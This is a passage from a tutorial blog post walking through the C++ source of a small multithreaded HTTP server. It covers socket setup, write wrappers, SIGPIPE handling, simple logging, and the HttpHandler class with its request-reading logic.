class="line">&#125;</span><br></pre></td></tr></table></figure><p>The wrapper around write/send follows the same pattern:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">ssize_t</span> <span class="title">writen</span><span class="params">(<span class="type">int</span> fd, <span class="type">void</span>*buf, <span class="type">size_t</span> len, <span class="type">bool</span> isWrite)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// Cast void* to char* so the pointer can be advanced below</span></span><br><span class="line">    <span class="type">char</span> *pos = (<span class="type">char</span>*)buf;</span><br><span class="line">    <span class="type">size_t</span> leftNum = len;</span><br><span class="line">    <span class="type">ssize_t</span> writtenNum = <span class="number">0</span>;</span><br><span class="line">    
<span class="keyword">while</span>(leftNum &gt; <span class="number">0</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">ssize_t</span> tmpWrite = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(isWrite)</span><br><span class="line">            tmpWrite = <span class="built_in">write</span>(fd, pos, leftNum);</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">            tmpWrite = <span class="built_in">send</span>(fd, pos, leftNum, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Write in a loop; on error, inspect errno</span></span><br><span class="line">        <span class="keyword">if</span>(tmpWrite &lt; <span class="number">0</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// Unlike read, on EAGAIN we keep retrying, because the data to write is controlled by the server side</span></span><br><span class="line">            <span class="keyword">if</span>(errno == EINTR || errno == EAGAIN)</span><br><span class="line">                <span class="keyword">continue</span>;</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">                <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span>(tmpWrite == <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        writtenNum += tmpWrite;</span><br><span class="line">        pos += tmpWrite;</span><br><span class="line">        leftNum -= tmpWrite;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> writtenNum;</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="7-建立连接">7. Establishing a connection</h3><p>With the functions above covered, we can now open a <strong>listening socket</strong> on the server side and wait for clients to connect:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">socket_bind_and_listen</span><span class="params">(<span class="type">int</span> port)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">int</span> listen_fd = <span class="number">0</span>;</span><br><span class="line">    <span class="comment">// Create the socket; note that this is a blocking socket</span></span><br><span class="line">    <span class="comment">// AF_INET      : IPv4 Internet protocols  </span></span><br><span class="line">    <span class="comment">// SOCK_STREAM  : TCP socket</span></span><br><span class="line">    <span class="keyword">if</span>((listen_fd = <span class="built_in">socket</span>(AF_INET, SOCK_STREAM, 
<span class="number">0</span>)) == <span class="number">-1</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Bind the port</span></span><br><span class="line">    sockaddr_in server_addr;</span><br><span class="line">    <span class="comment">// Zero-initialize the structure</span></span><br><span class="line">    <span class="built_in">memset</span>(&amp;server_addr, <span class="string">&#x27;\0&#x27;</span>, <span class="built_in">sizeof</span>(server_addr));</span><br><span class="line">    <span class="comment">// Fill in the address family, port and address</span></span><br><span class="line">    server_addr.sin_family = AF_INET;</span><br><span class="line">    server_addr.sin_port = <span class="built_in">htons</span>((<span class="type">unsigned</span> <span class="type">short</span>)port);</span><br><span class="line">    server_addr.sin_addr.s_addr = <span class="built_in">htonl</span>(INADDR_ANY);</span><br><span class="line">    <span class="comment">// Port reuse</span></span><br><span class="line">    <span class="type">int</span> opt = <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">setsockopt</span>(listen_fd, SOL_SOCKET, SO_REUSEADDR, &amp;opt, <span class="built_in">sizeof</span>(opt)) == <span class="number">-1</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">    <span class="comment">// Try to bind</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">bind</span>(listen_fd, (sockaddr*)&amp;server_addr, <span class="built_in">sizeof</span>(server_addr)) == <span class="number">-1</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">    <span class="comment">// Try to listen, with a maximum queue length of 
1024</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">listen</span>(listen_fd, <span class="number">1024</span>) == <span class="number">-1</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> listen_fd;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Note this part of the code, which sets the <strong>port reuse</strong> option:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Port reuse</span></span><br><span class="line"><span class="type">int</span> opt = <span class="number">1</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="built_in">setsockopt</span>(listen_fd, SOL_SOCKET, SO_REUSEADDR, &amp;opt, <span class="built_in">sizeof</span>(opt)) == <span class="number">-1</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="number">-1</span>;</span><br></pre></td></tr></table></figure><p>Normally, a port can be bound by only one socket, and other sockets cannot use it. Setting the <strong>port reuse</strong> option (SO_REUSEADDR) relaxes this restriction: in particular, it lets the server bind the same port again right after a restart, while connections from the previous run are still in TIME_WAIT.</p><blockquote><p>In the current WebServer-1.0, however, setting port reuse does not seem to be necessary, and removing it would do no real harm.</p></blockquote><h3 id="8-忽略-SIGPIPE-信号">8. 
Ignoring the SIGPIPE signal</h3><p>The <strong>SIGPIPE signal</strong> is raised when the server writes to a connection that the remote peer has already closed. The default action is to <strong>terminate the process</strong>, which is clearly not what we want. We therefore make WebServer ignore SIGPIPE so that it is not killed unexpectedly.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">handleSigpipe</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">sigaction</span> sa;</span><br><span class="line">    <span class="built_in">memset</span>(&amp;sa, <span class="string">&#x27;\0&#x27;</span>, <span class="built_in">sizeof</span>(sa));</span><br><span class="line">    sa.sa_handler = SIG_IGN;</span><br><span class="line">    sa.sa_flags = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">sigaction</span>(SIGPIPE, &amp;sa, <span class="literal">NULL</span>) == <span class="number">-1</span>)</span><br><span class="line">        <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;Ignore SIGPIPE failed! 
&quot;</span> &lt;&lt; <span class="built_in">strerror</span>(errno) &lt;&lt; std::endl;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h2 id="四、日志输出">IV. Log Output</h2><p>The output facility in WebServer-1.0 is fairly simple: it only writes messages to the terminal via stdout and stderr and does not create a log file.</p><p>The implementation is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * @brief   Macros and function for message output</span></span><br><span class="line"><span class="comment"> *          Use the form `LOG(INFO) &lt;&lt; &quot;msg&quot;;` to print a message.</span></span><br><span class="line"><span class="comment"> * @note    This macro is not complete yet: using LOG from multiple threads interleaves the output</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> INFO    1           <span class="comment">/* normal output */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> ERROR   2     
      <span class="comment">/* error output */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> LOG(x)  logmsg(x)   <span class="comment">/* call the output function */</span></span></span><br><span class="line"></span><br><span class="line"><span class="function">std::ostream&amp; <span class="title">logmsg</span><span class="params">(<span class="type">int</span> flag)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// Note: no mutual exclusion between threads is applied here</span></span><br><span class="line">    <span class="comment">// Get the thread's TID</span></span><br><span class="line">    <span class="type">long</span> tid = <span class="built_in">syscall</span>(SYS_gettid);</span><br><span class="line">    <span class="keyword">if</span>(flag == ERROR)</span><br><span class="line">    &#123;</span><br><span class="line">        std::cerr &lt;&lt; tid &lt;&lt; <span class="string">&quot;: [ERROR]\t&quot;</span>;</span><br><span class="line">        <span class="keyword">return</span> std::cerr;       </span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span>(flag == INFO)</span><br><span class="line">    &#123;</span><br><span class="line">        std::cout &lt;&lt; tid &lt;&lt; <span class="string">&quot;: [INFO]\t&quot;</span>;</span><br><span class="line">        <span class="keyword">return</span> std::cout;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">logmsg</span>(ERROR) &lt;&lt; <span class="string">&quot;Invalid LOG level&quot;</span> &lt;&lt; std::endl;</span><br><span class="line">        <span class="built_in">abort</span>();</span><br><span class="line">    &#125;</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure><p>To print a message to the terminal, simply call it as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;my msg&quot;</span> &lt;&lt; std::endl;</span><br></pre></td></tr></table></figure><p>Each message is automatically prefixed with the LWP id of the current thread and the message type (INFO/ERROR), for example:</p><p><img src="/2021/05/WebServer-1/image-20210512133247864.png" alt="image-20210512133247864"></p><p>Note that this output facility does <strong>not</strong> provide any mutual exclusion between threads, so when several threads use LOG at the same time, their output may be interleaved on the terminal and hard to read.</p><h2 id="五、http-请求处理">V. HTTP Request Handling</h2><h3 id="1-概述-3">1. Overview</h3><p>Once the Server has established a connection with a Client, the Client sends data to the Server, which must parse it and send the requested data back to the Client. Parsing the HTTP message and handling the HTTP headers are the key parts.</p><h3 id="2-连接">2. Connection</h3><p>After a new client socket (<strong>client_fd</strong>) has been created, the corresponding event is placed in the event queue and waits for an idle thread to handle it.</p><p>The event in question is the following function:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">handlerConnect</span><span class="params">(<span class="type">void</span>* arg)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">int</span>* fd_ptr = (<span class="type">int</span>*)arg;</span><br><span class="line">    <span class="type">int</span> client_fd = *fd_ptr;</span><br><span 
class="line">    <span class="keyword">delete</span> fd_ptr;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(client_fd &lt; <span class="number">0</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;client_fd error in handlerConnect&quot;</span> &lt;&lt; endl;</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function">HttpHandler <span class="title">handler</span><span class="params">(client_fd)</span></span>;</span><br><span class="line">    handler.<span class="built_in">RunEventLoop</span>();</span><br><span class="line">    <span class="built_in">close</span>(client_fd);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>As is easy to see, this function does only a few things:</p><ol><li>Takes out client_fd</li><li>Initializes an HttpHandler instance</li><li>Calls <code>HttpHandler::RunEventLoop</code></li><li>Finally closes client_fd</li></ol><p>The <strong>HttpHandler</strong> class is the focus of the rest of this section.</p><p>HttpHandler supports part of the HTTP/1.1 feature set: <strong>persistent connections</strong>. By default, its RunEventLoop member function reads requests from the client in a loop, processes them and sends back the corresponding responses.</p><p>The overall structure of HttpHandler is shown below; it consists of a number of member functions and a few member variables. RunEventLoop is the entry point that starts the whole request-handling loop:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span 
class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span 
class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * @brief HttpHandler handles each client connection and returns the matching response for the HTTP message it reads</span></span><br><span class="line"><span class="comment"> *        The supported HTTP version is HTTP/1.1</span></span><br><span class="line"><span class="comment"> * @note  Only part of the error handling is implemented; most error cases are not covered (but this is enough for now)</span></span><br><span class="line"><span class="comment"> */</span> </span><br><span class="line"><span class="keyword">class</span> <span class="title class_">HttpHandler</span></span><br><span 
class="line">&#123;</span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     *  @brief Internal status codes of HttpHandler </span></span><br><span class="line"><span class="comment">     */</span> </span><br><span class="line">    <span class="keyword">enum</span> <span class="title class_">ERROR_TYPE</span> &#123;</span><br><span class="line">        ERR_SUCCESS = <span class="number">0</span>,                <span class="comment">// No error</span></span><br><span class="line">        ERR_READ_REQUEST_FAIL,          <span class="comment">// Failed to read the request data</span></span><br><span class="line">        ERR_NOT_IMPLEMENTED,            <span class="comment">// The request uses an unsupported operation, e.g. POST</span></span><br><span class="line">        ERR_HTTP_VERSION_NOT_SUPPORTED, <span class="comment">// The client's HTTP version is not supported</span></span><br><span class="line">        ERR_INTERNAL_SERVER_ERR,        <span class="comment">// Internal program error</span></span><br><span class="line">        ERR_CONNECTION_CLOSED,          <span class="comment">// The remote connection has been closed</span></span><br><span class="line">        ERR_BAD_REQUEST,                <span class="comment">// The request is malformed and cannot be parsed  </span></span><br><span class="line">        ERR_SEND_RESPONSE_FAIL          <span class="comment">// Failed to send the response</span></span><br><span class="line">    &#125;;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief   Explicitly specify the client fd</span></span><br><span class="line"><span class="comment">     * @param   fd the fd of the connection, -1 by default</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="function"><span class="keyword">explicit</span> <span class="title">HttpHandler</span><span class="params">(<span class="type">int</span> fd = <span class="number">-1</span>)</span></span>;</span><br><span 
class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief   Releases all resources used by HttpHandler</span></span><br><span class="line"><span class="comment">     * @note    Does not close client_fd itself</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    ~<span class="built_in">HttpHandler</span>();</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief   Starts the event loop for the current connection</span></span><br><span class="line"><span class="comment">     * @note    1. The client fd must be set before the event loop starts</span></span><br><span class="line"><span class="comment">     *          2. Error handling is incomplete</span></span><br><span class="line"><span class="comment">     */</span> </span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">RunEventLoop</span><span class="params">()</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// There is a getter but no setter, because the fd must be set when the instance is created</span></span><br><span class="line">    <span class="function"><span class="type">int</span> <span class="title">getClientFd</span><span class="params">()</span> <span class="type">const</span>     </span>&#123; <span class="keyword">return</span> client_fd_; &#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">    <span class="keyword">static</span> <span class="keyword">constexpr</span> <span class="type">size_t</span> MAXBUF = <span class="number">1024</span>;   <span class="comment">// compile-time constant, so it can size the stack buffer in readRequest</span></span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> client_fd_;</span><br><span class="line">    <span class="comment">// Full raw data of the HTTP request</span></span><br><span class="line">    string request_;</span><br><span class="line">    <span class="comment">// HTTP headers</span></span><br><span class="line">    unordered_map&lt;string, string&gt; 
headers_; </span><br><span class="line">    </span><br><span class="line">    <span class="comment">// 请求方式</span></span><br><span class="line">    string method_;</span><br><span class="line">    <span class="comment">// 请求路径</span></span><br><span class="line">    string path_;</span><br><span class="line">    <span class="comment">// http版本号</span></span><br><span class="line">    string http_version_;</span><br><span class="line">    <span class="comment">// 是否是 `持续连接`</span></span><br><span class="line">    <span class="comment">// <span class="doctag">NOTE:</span> 为了防止bug的产生,对于每一个类中的isKeepAlive_来说,</span></span><br><span class="line">    <span class="comment">//       值只能从 true -&gt; false,而不能再次从 false -&gt; true</span></span><br><span class="line">    <span class="type">bool</span> isKeepAlive_;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 当前解析读入数据的位置</span></span><br><span class="line">    <span class="comment">/** </span></span><br><span class="line"><span class="comment">     * <span class="doctag">NOTE:</span> 该成员变量只在 </span></span><br><span class="line"><span class="comment">     *      readRequest -&gt; parseURI -&gt; parseHttpHeader -&gt; RunEventLoop </span></span><br><span class="line"><span class="comment">     * 内部中使用</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="type">size_t</span> pos_;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief 将当前client_fd_对应的连接信息,以 LOG(INFO) 的形式输出</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">printConnectionStatus</span><span class="params">()</span></span>;</span><br><span class="line"></span><br><span class="line">    <span 
class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief 从client_fd_中读取数据至 request_中</span></span><br><span class="line"><span class="comment">     * @return 0 表示读取成功, 其他则表示读取过程存在错误</span></span><br><span class="line"><span class="comment">     * @note 内部函数recvn在错误时会产生 errno</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="function">ERROR_TYPE <span class="title">readRequest</span><span class="params">()</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief 从0位置处解析 请求方式\URI\HTTP版本等</span></span><br><span class="line"><span class="comment">     * @return 0 表示成功解析, 其他则表示解析过程存在错误</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="function">ERROR_TYPE <span class="title">parseURI</span><span class="params">()</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief 从request_中的pos位置开始解析 http header</span></span><br><span class="line"><span class="comment">     * @return 0 表示成功解析, 其他则表示解析过程存在错误</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="function">ERROR_TYPE <span class="title">parseHttpHeader</span><span class="params">()</span></span>;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief   发送响应报文给客户端</span></span><br><span class="line"><span class="comment">     * @param   responseCode        http 状态码, http报文第二个字段</span></span><br><span class="line"><span class="comment">     * @param   responseMsg         http 报文第三个字段</span></span><br><span class="line"><span class="comment">    
 * @param   responseBodyType    返回的body类型,即 Content-type</span></span><br><span class="line"><span class="comment">     * @param   responseBody        返回的body内容</span></span><br><span class="line"><span class="comment">     * @return 0 表示成功发送, 其他则表示发送过程存在错误</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="function">ERROR_TYPE <span class="title">sendResponse</span><span class="params">(<span class="type">const</span> string&amp; responseCode, <span class="type">const</span> string&amp; responseMsg, </span></span></span><br><span class="line"><span class="params"><span class="function">                      <span class="type">const</span> string&amp; responseBodyType, <span class="type">const</span> string&amp; responseBody)</span></span>;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief 发送错误信息至客户端</span></span><br><span class="line"><span class="comment">     * @param errCode   错误http状态码</span></span><br><span class="line"><span class="comment">     * @param errMsg    错误信息, http报文第三个字段</span></span><br><span class="line"><span class="comment">     * @return 0 表示成功发送, 其他则表示发送过程存在错误</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="function">ERROR_TYPE <span class="title">handleError</span><span class="params">(<span class="type">const</span> string&amp; errCode, <span class="type">const</span> string&amp; errMsg)</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief 将传入的字符串转义成终端可以直接显示的输出</span></span><br><span class="line"><span class="comment">     * @param str 待输出的字符串</span></span><br><span class="line"><span class="comment">     * @return 转义后的字符串</span></span><br><span class="line"><span 
class="comment">     * @note  Escapes characters that a terminal cannot display, such as &#x27;\r&#x27;, into printable strings such as &quot;\r&quot;</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="function">string <span class="title">escapeStr</span> <span class="params">(<span class="type">const</span> string&amp; str)</span></span>;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><h3 id="3-错误类型">3. Error types</h3><p>HttpHandler defines the following error types:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">*  @brief Internal status codes of HttpHandler </span></span><br><span class="line"><span class="comment">*/</span> </span><br><span class="line"><span class="keyword">enum</span> <span class="title class_">ERROR_TYPE</span> &#123;</span><br><span class="line">    ERR_SUCCESS = <span class="number">0</span>,                <span class="comment">// No error</span></span><br><span class="line">    ERR_READ_REQUEST_FAIL,          <span class="comment">// Failed to read the request data</span></span><br><span class="line">    ERR_NOT_IMPLEMENTED,            <span class="comment">// Request method not supported, e.g. POST</span></span><br><span class="line">    ERR_HTTP_VERSION_NOT_SUPPORTED, <span class="comment">// The client&#x27;s HTTP version is not supported</span></span><br><span class="line">    ERR_INTERNAL_SERVER_ERR,        <span class="comment">// Internal server error</span></span><br><span class="line">    ERR_CONNECTION_CLOSED,          <span class="comment">// The remote connection has been closed</span></span><br><span 
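class="line">    ERR_BAD_REQUEST,                <span class="comment">// The request is malformed and cannot be parsed  </span></span><br><span class="line">    ERR_SEND_RESPONSE_FAIL          <span class="comment">// Failed to send the response</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>Apart from the first value, <code>ERR_SUCCESS</code>, which means <strong>no error</strong>, every error type has a corresponding handling strategy, such as <strong>closing the connection</strong> or <strong>sending a specific response to the client</strong>. These strategies are covered in the sections below.</p><h3 id="4-读取请求数据">4. Reading the request data</h3><p>When a remote client sends data to the server, the first step, whatever the data is, is to read it out of the socket&#39;s receive buffer and store it in our own buffer. One point must be clear: the read is <strong>blocking</strong>. Each client connection is handled by its own thread, so the handler cannot proceed until the server has read the whole request.</p><p>Also note that when readn is called, the client may have sent enough data that the number of bytes read equals the buffer size passed to readn. In that case the data must be saved and the loop must read again, because part of the request may still be unread. The code treats a return value smaller than the buffer size as the sign that all data from the client has been read, and at that point the <em>request-reading function</em> can return. This rule has an edge case: when the request length is an exact multiple of the buffer size, the loop issues one more blocking read.</p><p>Finally, readn can fail. A negative return value indicates a read error, and a return value of 0 when nothing has been read yet means the remote end has closed the connection. A little extra error handling is therefore needed to return the matching error code, ERR_READ_REQUEST_FAIL or ERR_CONNECTION_CLOSED.</p><p>Putting this together, the final implementation looks like this:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span 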
